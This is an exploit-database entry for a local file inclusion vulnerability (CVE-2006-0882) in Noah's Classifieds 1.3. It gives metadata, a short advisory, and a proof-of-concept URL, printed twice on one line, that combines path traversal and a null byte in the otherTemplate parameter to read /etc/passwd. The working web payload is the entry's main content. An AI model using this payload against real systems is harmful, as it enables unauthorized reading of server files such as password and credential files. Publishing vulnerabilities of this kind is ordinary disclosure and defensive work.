Noah's Classifieds 1.0/1.3 - Local File Inclusion

Author: trueend5
type: webapps
platform: php
port: 
date_added: 2006-02-22  
date_updated: 2013-08-02  
verified: 1  
codes: CVE-2006-0882;OSVDB-23564  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 27261.txt  

source: https://www.securityfocus.com/bid/16778/info

Noah's Classifieds is prone to a local file-include vulnerability. This may facilitate the unauthorized viewing of files and unauthorized execution of local scripts.

Version 1.3.0 is vulnerable; other versions may be affected as well.

http://www.example.com/classifieds/index.php?otherTemplate=/../../../etc/passwd%00http://www.example.com/classifieds/index.php?otherTemplate=/../../../etc/passwd%00